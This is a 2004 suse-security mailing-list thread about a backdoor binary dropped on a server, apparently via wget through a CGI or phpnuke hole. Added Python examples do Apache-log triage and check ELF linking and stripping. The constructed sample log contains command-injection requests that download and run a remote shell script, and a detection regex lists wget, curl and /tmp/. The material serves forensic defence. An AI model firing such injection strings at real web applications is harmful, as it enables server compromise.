RE: [suse-security] Backdoor over http(s)??
There seem to be a number of security problems with phpnuke - Nessus 2.0.8a lists 8 or more tests for various problems; http://www.phpnuke.org/ says that the latest version is 7.0 and fixes several security problems including SQL injection bugs. I couldn't see 6.9 listed as a release, but the site doesn't appear to have much useful information on it - most things highlight security fixes as a matter of urgency, this one seems to use <FONT SIZE=-1> for the security fixes that are listed!

I've downloaded the rs.c from the web site and it does compile, but it generates a 6.5KB executable, not the 450KB executable that you have. I don't think rs.c is all of the code, or it's a different program, or possibly a much, much earlier incarnation of it.

I would think that your Apache logs might tell you more about who executed what and when just prior to the time when the executable appeared on your system.

-----Original Message-----
From: Mátyás Tibor [mailto:templar@tempi.scene.hu]
Sent: 13 January 2004 16:33
To: Rick Green
Cc: suse-security@suse.com
Subject: Re: [suse-security] Backdoor over http(s)??

I have got in /cgi-bin/ directory:
- neomail (1.26)
- openwebmail (2.30)
- SuSE things
- sanecgi
but nothing else. And I have Phpnuke 6.9 (?? PHP ??)
-----
Ok, somebody could use wget, but what about the .do.sh --> how was it possible to execute it?

Tibor

On Tue, 13 Jan 2004 10:33:27 -0500 (EST), Rick Green wrote:
Before you get too involved in analysing the content of the file that was imported to your machine, you may want to close the facility that allowed the download in the first place! What have you got in your cgi-bin directory that allows arbitrary use of wget?
-- Rick Green
"They that can give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety." -Benjamin Franklin
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
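The Apache-log triage suggested above, as an added example that is not part of the thread or of any SuSE tool. It parses access-log lines in NCSA combined format, keeps only requests to CGI or PHP targets in a window before the dropped file's mtime, and flags the ones whose decoded query carries download-or-execute tokens (wget, /tmp/, a shell metacharacter). The log lines are constructed; /cgi-bin/example.cgi is a hypothetical script standing in for whatever CGI allowed arbitrary use of wget, 192.0.2.44 and 203.0.113.9 are documentation addresses, and the +0100 timezone on the mtime is an assumption. The .do.sh name and the Jan 8 03:49 mtime are taken from the thread.

```python
"""Triage Apache access-log lines for the request that fetched and ran a dropped file.

Added example, not code from the suse-security thread. All log lines below are
constructed; /cgi-bin/example.cgi is a hypothetical vulnerable CGI.
"""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# NCSA common/combined format: ip ident user [ts] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Tokens a download-and-execute request injected through a CGI or PHP parameter
# typically carries; matched against the URL-decoded request line.
SUSPICIOUS = re.compile(r"\b(wget|curl|lynx|chmod)\b|/tmp/|/dev/shm/|\.sh\b|[;|`]")

# Constructed sample log (not real data). Only the two 03:48 requests are the attack.
LOG_LINES = [
    '10.0.0.5 - - [08/Jan/2004:03:40:12 +0100] "GET /modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [08/Jan/2004:03:47:51 +0100] "GET /cgi-bin/example.cgi?page=index HTTP/1.0" 200 812',
    '192.0.2.44 - - [08/Jan/2004:03:48:03 +0100] "GET /cgi-bin/example.cgi?page=;wget%20http://203.0.113.9/.do.sh%20-O%20/tmp/.do.sh HTTP/1.0" 200 0',
    '192.0.2.44 - - [08/Jan/2004:03:48:20 +0100] "GET /cgi-bin/example.cgi?page=;sh%20/tmp/.do.sh HTTP/1.0" 200 0',
    '10.0.0.7 - - [08/Jan/2004:03:55:00 +0100] "GET /index.php HTTP/1.1" 200 3310',
    '192.0.2.44 - - [08/Jan/2004:09:00:00 +0100] "GET /cgi-bin/example.cgi?page=;wget%20http://203.0.113.9/x HTTP/1.0" 200 0',
    'not a log line',
]
# mtime of the dropped binary as `ls -l` showed it (Jan 8 03:49); the timezone is assumed.
ARTIFACT_MTIME = datetime(2004, 1, 8, 3, 49, 0, tzinfo=timezone(timedelta(hours=1)))


def parse(line: str):
    """Parse one access-log line; None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    # Decode %20 etc. so the token match sees what the CGI saw.
    rec["decoded"] = unquote(rec["target"].replace("+", " "))
    return rec


def triage(lines, artifact_mtime, window=timedelta(hours=2)):
    """Requests to CGI/PHP targets in the `window` before the dropped file's mtime
    whose decoded request carries download-or-execute tokens, oldest first."""
    hits = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if not (artifact_mtime - window <= rec["ts"] <= artifact_mtime):
            continue
        path = rec["decoded"].split("?", 1)[0]
        if not (path.startswith("/cgi-bin/") or path.endswith(".php")):
            continue
        if SUSPICIOUS.search(rec["decoded"]):
            hits.append(rec)
    return sorted(hits, key=lambda r: r["ts"])


def by_client(hits):
    """Map client IP -> ordered decoded requests, to read one intruder's session."""
    out = {}
    for h in hits:
        out.setdefault(h["ip"], []).append(h["decoded"])
    return out


if __name__ == "__main__":
    # On a real box: triage(open("/var/log/apache/access_log").read().splitlines(), mtime)
    for ip, reqs in by_client(triage(LOG_LINES, ARTIFACT_MTIME)).items():
        print(ip)
        for r in reqs:
            print("   ", r)
```

Widen the window if the dropped file's mtime was reset, and remember that POST bodies are not in the access log; only the request line is, so a payload sent in a form body will show up as a bare POST to the script and has to be correlated by client address and time instead.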
Hemsley, Trevor wrote:
...
I've downloaded the rs.c from the web site and it does compile but it generates a 6.5KB executable not the 450KB executable that you have. I don't think rs.c is either all of the code or it's a different program or possibly a much much earlier incarnation of it. ...
You need to compile it statically & strip to do a real compare. They are not the same:

-r--r--r-- 1 kbrannen users 435444 Jan 8 03:49 rhs
-r--r--r-- 1 kbrannen users 396716 Jan 13 10:55 rs

rhs: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
rs: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Kevin
On Tue, Jan 13, 2004 at 04:55:37PM -0000, Hemsley, Trevor wrote:
I've downloaded the rs.c from the web site and it does compile but it generates a 6.5KB executable not the 450KB executable that you have. I don't think rs.c is either all of the code or it's a different program or possibly a much much earlier incarnation of it.
If you compile a static binary and strip symbols from this file you
get nearly the same size.
--
Stefan Tichy
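The two properties `file` reported for rhs and rs in Kevin's and Stefan's replies, "statically linked" and "stripped", can be checked directly from the ELF headers. The following is an added example, not code from the thread or from SuSE: it reads the ELF header, program headers and section headers with the standard library only, reporting an executable as dynamically linked when it carries PT_INTERP or PT_DYNAMIC and as stripped when it has no section table or no SHT_SYMTAB section. The two sample images are constructed in memory as header-only ELF32 i386 files (not loadable, and not the rhs/rs binaries from the thread); pass real paths on the command line to run it on actual files.

```python
"""Report whether an ELF file is statically linked and stripped.

Added example, not code from the suse-security thread. Parses ELF32 and ELF64
headers directly; the sample images below are constructed and header-only.
"""
import struct
import sys

PT_DYNAMIC, PT_INTERP = 2, 3
SHT_SYMTAB = 2
MACHINES = {3: "Intel 80386", 62: "x86-64", 40: "ARM", 183: "AArch64"}


def inspect_elf(data: bytes) -> dict:
    """Return class, machine, static-linking and strip status for an ELF image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    cls, order = data[4], data[5]          # EI_CLASS, EI_DATA
    end = "<" if order == 1 else ">"       # ELFDATA2LSB is 1
    if cls == 1:                            # ELF32: header, phdr, shdr layouts
        hdr_fmt, ph_fmt, sh_fmt = "HHIIIIIHHHHHH", "IIIIIIII", "IIIIIIIIII"
    elif cls == 2:                          # ELF64
        hdr_fmt, ph_fmt, sh_fmt = "HHIQQQIHHHHHH", "IIQQQQQQ", "IIQQQQIIQQ"
    else:
        raise ValueError("unknown ELF class %d" % cls)
    (_e_type, e_machine, _ver, _entry, e_phoff, e_shoff, _flags, _ehsize,
     e_phentsize, e_phnum, e_shentsize, e_shnum, _shstrndx) = struct.unpack_from(end + hdr_fmt, data, 16)

    # p_type is the first field of a program header in both classes.
    p_types = {struct.unpack_from(end + ph_fmt, data, e_phoff + i * e_phentsize)[0]
               for i in range(e_phnum)}
    # sh_type is the second field of a section header in both classes.
    sh_types = {struct.unpack_from(end + sh_fmt, data, e_shoff + i * e_shentsize)[1]
                for i in range(e_shnum)}

    return {
        "class": 32 if cls == 1 else 64,
        "machine": MACHINES.get(e_machine, "unknown (%d)" % e_machine),
        # A dynamically linked executable names its loader in PT_INTERP and has PT_DYNAMIC.
        "static": PT_INTERP not in p_types and PT_DYNAMIC not in p_types,
        # `strip` removes .symtab; a file with no section table at all is stripped too.
        "stripped": e_shnum == 0 or SHT_SYMTAB not in sh_types,
    }


def build_elf32(dynamic: bool, with_symtab: bool) -> bytes:
    """Constructed minimal ELF32 i386 image (headers only, not runnable) for the demo."""
    phdrs = [(1, 0, 0x08048000, 0x08048000, 0, 0, 5, 0x1000)]      # PT_LOAD
    if dynamic:
        phdrs.append((PT_INTERP, 0, 0, 0, 0, 0, 4, 1))
        phdrs.append((PT_DYNAMIC, 0, 0, 0, 0, 0, 6, 4))
    shdrs = [(0,) * 10]                                              # SHT_NULL
    if with_symtab:
        shdrs.append((1, SHT_SYMTAB, 0, 0, 0, 0, 0, 0, 4, 16))
    phoff, shoff = 52, 52 + 32 * len(phdrs)
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\0" * 8             # 32-bit, LSB, v1, SYSV
    hdr = struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x08048000, phoff, shoff, 0,
                      52, 32, len(phdrs), 40, len(shdrs), 0)           # ET_EXEC, EM_386
    return (ident + hdr
            + b"".join(struct.pack("<IIIIIIII", *p) for p in phdrs)
            + b"".join(struct.pack("<IIIIIIIIII", *s) for s in shdrs))


if __name__ == "__main__":
    targets = {p: open(p, "rb").read() for p in sys.argv[1:]} or {
        "rhs-like (constructed)": build_elf32(dynamic=False, with_symtab=False),
        "plain gcc output (constructed)": build_elf32(dynamic=True, with_symtab=True),
    }
    for name, blob in targets.items():
        info = inspect_elf(blob)
        print("%s: ELF %d-bit, %s, %s, %s" % (
            name, info["class"], info["machine"],
            "statically linked" if info["static"] else "dynamically linked",
            "stripped" if info["stripped"] else "not stripped"))
```

Once both files report the same class, machine, linking and strip status, a byte-level comparison (cmp, or a hash) is meaningful; before that, as the thread shows, the size difference alone says nothing about whether rs.c is the source of the binary.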
participants (3):
- Hemsley, Trevor
- Kevin Brannen
- Stefan Andreas Tichy